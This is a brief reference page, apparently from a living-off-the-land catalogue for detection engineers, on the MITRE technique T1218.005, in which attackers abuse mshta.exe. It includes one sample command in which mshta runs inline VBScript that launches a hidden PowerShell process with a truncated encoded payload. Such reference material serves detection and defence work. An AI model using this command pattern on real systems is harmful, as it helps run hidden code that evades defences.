T1218.005: Mshta
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and inline VBScript or JScript.
Total Capable Binaries: 1
•
Windows: 1
•
Linux: 0
•
macOS: 0
Living-off-the-Land Matrix for T1218.005
Across 1 verified binariesWindows2 payloads
mshta.exe
Microsoft HTML Application (MSHTA) host executes .hta files and scripts embedded inside web pages. Attackers abuse mshta to execute malicious inline VBScript or JScript directly from the command line or remote HTTP servers.
Sample Attack Vector:
mshta.exe vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run ""powershell.exe -nop -w hidden -enc JAB...="",0"))Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection Engineer • Check Point